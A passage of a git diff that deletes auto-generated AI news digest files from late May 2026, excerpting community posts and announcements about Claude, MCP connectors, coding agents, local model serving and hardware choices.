covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d… - ---- - -## [Finally tested an AI video tool that works directly in Claude without setup](https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/) -*Reddit r/ClaudeAI* | 26/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi… - ---- - -## [Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event](https://x.com/Scobleizer/status/2057868124112982526) -*Aligned News (Scoble)* | 26/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event. - ---- - diff --git a/data/digest-2026-05-27.md b/data/digest-2026-05-27.md deleted file mode 100644 index b43798b..0000000 --- a/data/digest-2026-05-27.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-27** | 15 stories | Auto-generated from 680 archived stories - ---- - -## [MarkdownAI v2.0, its a workflow engine, not a template parser](https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 -Tags: api_update, mcp, tool_update - -> MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl… - ---- - -## [I ran 8 open-weight models as agents in a persistent MMO for 10 days. Here's the 93k event dataset and some things that I learned](https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every "player" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d… - ---- - -## [Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.](https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, open_source, agent_tool - -> been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = "atlas" default_model = "deepseek-ai/deepseek-v4-flash" [[ custom_providers ]] name = "atlas" base_url = "https://api.atlascloud.ai/v1" api_key_env = "ATLAS_API_KEY" model = "deepseek… - ---- - -## [I built a tool that lets your AI assistant test your entire app in a real browser](https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.94 -Tags: mcp, open_source, developer_tool - -> So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant "test the login flow" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing) - ---- - -## [Anthropic just confirmed why 90% of non-coding AI agents fail in production](https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet."* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. * Why the Rest of the World is Hard: A sales or marketing agent doesn’t… - ---- - -## [[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]](https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/) -*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/) - ---- - -## [Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?](https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. (No idea how much system ram I will get, but I guess they are a bit flexible on this). \- I want to build a inference endpoint that can handle up to 30 users. \- I want a fairly reasonable big context, say 131,072-262,144. \- I think in most situations, realistically speaking, not more than 10-15 users will use it concurrently. \- Main use for this will be tools like Pi and OpenCode. Was thinking to use Qwen3.6-27B unless anyone can recommend a better one for agentic coding given the constrains. \- Should I use vllm or llama.cpp? Will llama.cpp able to handle the concurrency? \- If running on llama.cpp I would probably use UD-Q6\_K\_XL or UD-Q8\_K\_XL quant from Unsloth. \- If running on vllm I have no idea on what quant to use? Some advice here would be great. \- Is there any good tool to benchmark "concurrent users"? - ---- - -## [litellm vs any-llm (otari)](https://reddit.com/r/LocalLLaMA/comments/1tp6p5j/litellm_vs_anyllm_otari/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I am considering switching from litellm (sdk) to Mozilla’s [any-llm.](https://github.com/mozilla-ai/any-llm) They also have a proxy to go with it called [otari.](https://github.com/mozilla-ai/otari) On the face of it the repos looks a lot more well kept and stable (had a lot of issues with litellm before). Was wondering if others have already done similar and have positive or negative experiences - ---- - -## [Beating the $100 SDK Credit Cap: Parallel Orchestration and Extended Timeouts in Agent Fleets](https://reddit.com/r/ClaudeAI/comments/1tp1476/beating_the_100_sdk_credit_cap_parallel/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Anthropic’s impending shift to meter programmatic Agent SDK and `claude -p` usage under a rigid monthly credit allowance means developers have to start engineering for extreme token frugality and runtime efficiency. If your workflow engine blocks your entire system every time an agent runs a long file modification, your operational costs and development velocity take a massive hit. Flotilla v0.5.0 completely overhauls its background execution engine to maximize Claude's heavy-lifting potential while shielding your wallet from continuous credit drains: * **Non-Blocking Parallel Loops (v5)**: As mapped out in the blueprint, we swapped out sequential, blocking subprocess calls for an asynchronous process group manager tracking active workflows concurrently via non-blocking `Popen` execution. * **The 30-Minute Claude Safe-Window**: Complex multi-file engineering steps or Claude Code sessions frequently get choked out by standard tool limits. We replaced uniform global process constraints with an explicit per-agent map, extending Claude's runtime allowance to 1800s (30 minutes) to entirely eliminate `SIGTERM` / exit 143 mid-task terminations. * **Smart Local Delegation**: To keep you c… - ---- - -## [Claude Code has zero idea what your codebase looks like structurally (Open source with benchmarks)](https://reddit.com/r/ClaudeAI/comments/1tpbjwo/claude_code_has_zero_idea_what_your_codebase/) -*Reddit r/ClaudeAI* | 27/05/2026 | Score: 0.78 -Tags: mcp, open_source - -> Every time I watch someone use Claude Code on a real codebase, the same thing happens. It rewrites a module that three other modules depend on without any awareness of coupling. It just reads the file, makes changes, moves on It reads files one at a time without any map. Doesn't know which files are coupled. Doesn't know who owns what. Doesn't know why that weird pattern in the auth module exists on purpose. I've been building an open source MCP layer to fix this called repowise. Self-hosted, pip install, AGPL-3.0. Five context layers that sit between your codebase and the model: Graph - AST-based dependency graph. Knows what depends on what before it touches anything. Git - Hotspots, ownership, co-change patterns, bus factor. "This file always changes with these three other files. Docs - Auto-generated wiki from your code. Searchable. Decisions - Captures architectural intent. Why the code is shaped the way it is. Stops the model from "fixing" things that were intentional. Code Health - 12 biomarkers per file. Complexity, duplication, untested hotspots, declining trends. Zero LLM, pure static analysis. We ran a time-travel experiment on Django (542 files): scored every file, then… - ---- - -## [Millions of AI agents imperiled by critical vulnerability in open source package](https://arstechnica.com/information-technology/2026/05/millions-of-ai-agents-imperiled-by-critical-vulnerability-in-open-source-package/) -*Ars Technica AI* | Score: 0.74 -Tags: open_source, developer_tool - ---- - -## [CrankGPT by Squeez Labs - hand-cranked edge AI - talk about local AI!!!](https://reddit.com/r/LocalLLaMA/comments/1tpm7m3/crankgpt_by_squeez_labs_handcranked_edge_ai_talk/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: tool_update - -> I met Katrin from Squeez Labs at an event hosted by Pathway AI (the team behind Baby Dragon Hatchling) where she told me about CrankGPT, a literally hand-cranked device for running local LLMs. It's apparently real. It's appearently launched. It's apparently glorious. Check it out at [https://crankgpt.com/](https://crankgpt.com/) \- if anyone from Squeez Labs posts here and I'm stealing their thunder, I'll take the post down! But I've been really excited about this. So local you gotta squeez it with yer own armz. ;) [https://www.youtube.com/watch?v=HSapdLYpmWY](https://www.youtube.com/watch?v=HSapdLYpmWY) - ---- - -## [BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison [R]](https://reddit.com/r/MachineLearning/comments/1tpjx2m/beam_100k_memory_benchmark_csm_vs_hindsight_local/) -*Reddit r/MachineLearning* | 27/05/2026 | Score: 1.00 -Tags: open_source - -> \[R\] BEAM 100K memory benchmark: CSM vs Hindsight local artifact comparison I’m looking for feedback on a local agent-memory benchmark comparison, especially from people who care about evaluation methodology. I built an open-source R&D memory system called Context Swarm Memory (CSM). It uses bounded read-only memory shards, query routing, probe/recall/synthesis, cited packets, and explicit Committer-gated writes. The current comparison is against the accepted local Hindsight artifact on BEAM 100K: * CSM: 0.757573 AMB score, 342 / 400 correct * Hindsight: 0.733658 AMB score, 326 / 400 correct * CSM uses 38.2% fewer answer-visible context tokens * CSM is slower: 29.23s average retrieval vs 6.38s I want to be precise about the claim: This is not an official leaderboard claim. It is not a BEAM 10M claim. It is a committed local accepted-artifact comparison at 100K, and the next step should be independent replication or official chart acceptance. Repo: [https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory](https://github.com/muhamadjawdatsalemalakoum/context-swarm-memory) Evidence and reproducibility notes: [https://muhamadjawdatsalemalakoum.github.io/context-swarm-me… - ---- - -## [Running real-time 1080p video generation and editing on your own (Dreamverse OSS release)](https://reddit.com/r/StableDiffusion/comments/1tpfbrl/running_realtime_1080p_video_generation_and/) -*Reddit r/StableDiffusion* | 27/05/2026 | Score: 1.00 -Tags: open_source - -> Hi guys, FastVideo team here again. Following up on our[ Dreamverse post](https://haoailab.com/blogs/dreamverse/), today we finally cleaned our code up and are excited to say that it's open source! Both the backend and frontend are out, so you can self-host the whole thing. B200s aren't exactly consumer hardware (we know), so the easiest path is to rent one from a cloud GPU provider. Once you've got access, spin up the server and start editing videos in your browser. There's also a mock backend in the repo if you want to hack on the UI without touching a GPU. The release covers the browser workspace, Python runtime for sessions and worker management, fMP4 streaming over websocket, prompt rewriting with safety filters, plus Docker images. The idea is that it can also serve as a sample architecture for anyone building their own real-time video gen apps. One more thing before you go. On the RTX 5090 side, we've gotten Wan2.1 1.3B running in under 2s on a single 5090, and we're working on integrating it into Dreamverse so y'all don't need a B200 to play with this. More on that soon :) Repo: [https://github.com/hao-ai-lab/FastVideo/tree/main/apps/dreamverse](https://github.com/hao-ai-l… - ---- - -## [Qwen3.6 huge quality gain from Q4 to Q6 for coding agent](https://reddit.com/r/LocalLLaMA/comments/1tpebhw/qwen36_huge_quality_gain_from_q4_to_q6_for_coding/) -*Reddit r/LocalLLaMA* | 27/05/2026 | Score: 1.00 -Tags: agent_tool - -> So, last week I tried to update my unused local LLM setup. I had to stop using it because quality was too low and deepseek was too cheap. First thing I stopped using Ollama and now I only use llama.cpp built in server that works really great. The quality improvement from Q4 to Q6 is outstanding and finally a local LLM server can work very similarly to paid APIs. That's great! And MTP makes a big performance gain, on a dual 3090 (downvolted and limited to 65°C) it generates from 20 to 50 tokens per second with minimal heat generation. So yes, that time has finally arrived! Local coding agents are a thing and they work 😎 - ---- - diff --git a/data/digest-2026-05-28.md b/data/digest-2026-05-28.md deleted file mode 100644 index 83ddda6..0000000 --- a/data/digest-2026-05-28.md +++ /dev/null @@ -1,121 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-28** | 15 stories | Auto-generated from 714 archived stories - ---- - -## [Claude Code 2.1.153 Open Changelog Reflects Anthropic's Transparent Developer Tooling Strategy](https://x.com/ClaudeCodeLog/status/2059802880811434228) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: cli_tool, tool_update, agent_tool - -> Anthropic's commitment to publishing detailed Claude Code changelogs with every release enables developers to track improvements and plan migrations. Version 2.1.153 with 36 CLI changes reflects rapid iteration in the agentic coding space. - ---- - -## [I built and open-sourced Skill Index to organize & standardize your AI agent knowledge across Claude, Codex, Cursor, and more. 100% local and free on macOS.](https://reddit.com/r/ClaudeAI/comments/1tprx27/i_built_and_opensourced_skill_index_to_organize/) -*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 -Tags: mcp, open_source, agent_tool - -> I’ve been using Claude alongside other coding agents, and I kept running into the same problem: useful skills, MCPs, commands, hooks, and workflows start getting scattered across different tools. Sometimes Claude has the best version of something. Sometimes Codex or Cursor does. Sometimes an MCP is configured in one agent but missing or slightly different in another. Over time, it gets harder to treat your agent knowledge as one reusable system. So I built Skill Index: a free, open-source, 100% local macOS app for organizing and standardizing AI agent knowledge. The goal is to make it easier to bring reusable skills/MCPs/agent knowledge into Claude, while also keeping Claude’s own knowledge portable across the rest of your setup. It can help you: \- see where your skills and MCPs live \- compare what Claude, Codex, Cursor, Windsurf, and other agents can access \- standardize around a canonical definition of each skill/MCP \- keep your skills and MCPs in sync across every agent It’s local-first: no accounts, no cloud sync, no telemetry. Website: [https://skillindex.app](https://skillindex.app) GitHub: [https://github.com/arjitj2/skillindex](https://github.com/arjitj2/skillindex) - ---- - -## [MCP Servers / Connectors in Claude Desktop / Cowork via AWS Bedrock](https://reddit.com/r/ClaudeAI/comments/1tpxskx/mcp_servers_connectors_in_claude_desktop_cowork/) -*Reddit r/ClaudeAI* | 28/05/2026 | Score: 0.78 -Tags: mcp, developer_tool, cli_tool - -> While using MCP servers in the code CLI works with MCP servers, I'm having trouble using connectors or MCP servers in Cowork. Connecting to Jira or O365 seems not possible. With Bedrock, we don't have the Chat, but only the Cowork tab and also some additional settings are missing. I tried configuring the claude\_desktop\_config.json with MCP servers, but cowork doesn't seem to be able to use it. I can Import a manual plugin, but after a restart it seems gone and configuring it in cowork is not possible, the authentication doesn't work. Did anyone manage to get Connectors / MCP Servers / Plugins in Claude Desktop with Bedrock to work, and if so, how? - ---- - -## [Introducing Claude Opus 4.8](https://reddit.com/r/ClaudeAI/comments/1tq99mu/introducing_claude_opus_48/) -*Reddit r/ClaudeAI* | 28/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> We’re upgrading Claude Opus to a new version: Claude Opus 4.8. It builds on Opus 4.7 with sharper judgment, more honesty about its own progress, and the ability to work independently for longer than its predecessors. Available today for the same price. In Claude Code, you can hand off a feature, a migration, or a bug sweep and let it follow the work through while you focus on what’s next. Also launching today: * Fast mode for Opus 4.8 (research preview). Same model at roughly 2.5x the speed, now three times cheaper than before. * Dynamic workflows in Claude Code (research preview). Claude runs hundreds of parallel subagents in a single session and verifies its work before reporting back. * A new effort control on [claude.ai](http://claude.ai), so you can choose how much thinking Claude puts into a response. Claude Opus 4.8 is live today on [claude.ai](http://claude.ai), the Claude Platform, and all major cloud platforms. Read more: [anthropic.com/news/claude-opus-4-8](http://anthropic.com/news/claude-opus-4-8) - ---- - -## [I built an enforcement layer for AI coding agents using a local knowledge graph and hybrid RAG](https://reddit.com/r/LocalLLaMA/comments/1tq6sd0/i_built_an_enforcement_layer_for_ai_coding_agents/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> I know this sub is focused on local models but the architecture behind this applies to any LLM-powered coding agent, not just Claude Code. The problem: when you give a coding agent a large set of rules and standards, two things break. The context fills up with rules that aren't relevant to the current task, and nothing enforces compliance. The agent reads your instructions and decides what to follow. I built Writ to solve both. The knowledge layer: rules, skills, techniques, antipatterns, and playbooks live as nodes in a Neo4j knowledge graph with typed relationships between them. A five stage retrieval pipeline (BM25 over Tantivy, vector similarity over HNSW with a local ONNX embedding model, graph traversal, reciprocal rank fusion, context budget management) retrieves only what's relevant per task. Everything runs locally. No API calls for retrieval. The embedding model (all-MiniLM-L6-v2) runs through ONNX runtime, not PyTorch, so inference is fast without a GPU. The enforcement layer: 30 bash hook scripts intercept tool calls before execution. The agent can't write code without an approved plan, can't skip tests, can't say "tests pass" without running static analysis. These are… - ---- - -## [Kept context-switching between arxiv, OpenReview, GitHub, and HuggingFace for every paper, so I built this. Chrome extension + website with everything inline, plus citation graph + SPECTER2 neighbors. 3M papers, free, feedback welcome [P]](https://reddit.com/r/MachineLearning/comments/1tq53il/kept_contextswitching_between_arxiv_openreview/) -*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com/) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? - ---- - -## [Built a richer reading layer for arxiv (Chrome extension + web): OpenReview reviews, GitHub/HuggingFace links, citation graph, SPECTER2 neighbors, TLDRs. 3M papers, free, looking for feedback [P]](https://reddit.com/r/MachineLearning/comments/1tq31yu/built_a_richer_reading_layer_for_arxiv_chrome/) -*Reddit r/MachineLearning* | 28/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Spent the last few months building a deeper context layer over arxiv. Each paper gets a Tomesphere page with a TLDR + key findings (LLM-curated), OpenReview reviews where the venue is public, linked GitHub repos, HuggingFace models, conference videos, the citation graph in both directions, and a SPECTER2-based semantic neighbor graph. Same panel renders inline on arxiv via a Chrome extension (MV3 side panel API), or you can browse directly at tomesphere.com. 3M arxiv papers indexed. Caveats: reviewer scores only cover venues that publish openly on OpenReview (NeurIPS, ICLR, ICML, TMLR, COLM). Blind-review venues like CVPR, AAAI, ECCV are out of scope until contributors fill them in. GitHub, Hugging Face, and conference video matches are best-effort. Free, no signup. Site: [tomesphere.com](http://tomesphere.com) Chrome: [chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk](https://chromewebstore.google.com/detail/tomesphere/nopoigoclhjcopjppnehidnkljmabllk) Would love feedback, especially: which paper did you check first, and what's missing that you'd actually use? - ---- - -## [SDXL image generation now works on iPhone. The bug that blocked it for months was a missing file check](https://reddit.com/r/StableDiffusion/comments/1tq302b/sdxl_image_generation_now_works_on_iphone_the_bug/) -*Reddit r/StableDiffusion* | 28/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> We've been building \[Off Grid\](https://github.com/alichherawalla/off-grid-mobile-ai) - open-source app for on-device AI (text + image gen, no cloud). SDXL on iPhone was broken for months. Users kept reporting it, we couldn't reproduce it consistently. Turns out: SDXL models ship in two UNet layouts: \- Monolithic: one big \`Unet.mlmodelc\` file \- Chunked: \`UnetChunk1.mlmodelc\` + \`UnetChunk2.mlmodelc\` Our validation code only checked for the monolithic layout. If you downloaded a chunked SDXL model (which most are), the app said "model invalid" and refused to load it. Months of reports. The fix was adding the chunked layout check — straightforward once we understood the problem. The app uses Apple's ml-stable-diffusion framework with CoreML. On an iPhone 15 Pro, you get SDXL images in about 30-45 seconds fully on-device. No internet needed at any point - the model lives on your phone. It's free and open source: \- GitHub: [https://github.com/alichherawalla/off-grid-mobile-ai](https://github.com/alichherawalla/off-grid-mobile-ai) \- iOS: [https://apps.apple.com/us/app/off-grid-local-ai/id6759299882](https://apps.apple.com/us/app/off-grid-local-ai/id6759299882) \- Android (SD… - ---- - -## [DSPy v3.3.0 Beta Brings ReActV2 to Open-Source AI Programming Framework](https://x.com/isaacbmiller1/status/2059828079371894786) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> Stanford's DSPy framework released v3.3.0 beta on PyPI with ReActV2, improved LM/BaseLM architecture, and RLM data-passing support. DSPy is widely used for structured programming with language models in both research and production. - ---- - -## [Tencent WorkBuddy Global Launch Brings China's Top Desktop AI Agent to International Markets](https://x.com/TencentAI_News/status/2059827192964808922) -*Aligned News (Scoble)* | 28/05/2026 | Score: 1.00 -Tags: product_launch, agent_tool - -> Tencent's WorkBuddy desktop AI agent — already China's market leader — launches worldwide with autonomous handling of coding, analysis, and productivity tasks. The global launch challenges Microsoft Copilot, Cursor, and other Western enterprise AI assistants on their home turf. - ---- - -## [Local run for multi users: which software set?](https://reddit.com/r/LocalLLaMA/comments/1tq0cj7/local_run_for_multi_users_which_software_set/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> Context: I am testing and running local LLM on Linux for some months, first with llama.cpp and now with vLLM for better concurrent capabilities. I use llama-swap in front of either vLLM or llama.cpp in order to have thinking and non-thinking variants exposed with all inference parameters adjusted according to the model requirements. My needs: now, I would like to make the LLM available to multiple (less than 10) users, outside from the local network: https access, web chat interface with either connection or api-key, API access with api-key. What I tried: * apache as frontend proxy: handle SSL part and redirect to internal applications as unsecured connections. * LibreChat as web user interface * llama-swap * vLLM Observed problems: * concurrency is limited to 10 requests (llama-swap limitation, either find how to raise this value or good alternative) * LibreChat only gives web interface, still need API access with keys management. Which open source software set do you use to serve multiple users? Do you know simple keys management tools? Did I miss something? Thank for any help! - ---- - -## [OpenAI releases secure tunnels to connect private Model Context Protocol servers without modifying inbound firewallsOutbound-only HTTPS tunnels secure the connection to OpenAI.](https://www.digg.com/ai/28n5w7d2) -*Digg AI* | Score: 1.00 -Tags: mcp, product_launch - ---- - -## [Genesis AI launches Genesis World 1.0, an open-source robotics simulator that turns one hour of real-world testing into 100 simulation daysIt features GPU-accelerated physics solvers and path-traced rendering](https://www.digg.com/ai/tuo1sird) -*Digg AI* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools](https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet. - ---- - -## [GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? (5 devs, agentic coding)](https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/) -*Reddit r/LocalLLaMA* | 28/05/2026 | Score: 1.00 -Tags: api_update, agent_tool - -> Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem… - ---- - diff --git a/data/digest-2026-05-29.md b/data/digest-2026-05-29.md deleted file mode 100644 index bbd25dd..0000000 --- a/data/digest-2026-05-29.md +++ /dev/null @@ -1,111 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-29** | 15 stories | Auto-generated from 468 archived stories - ---- - -## [Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents](https://x.com/runtimewire/status/2059782827927810437) -*Aligned News (Scoble)* | 29/05/2026 | Score: 1.00 -Tags: mcp, tool_update, agent_tool - -> Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration. - ---- - -## [Kling AI Skill Launches for Agent Workflows — Text-to-Video, 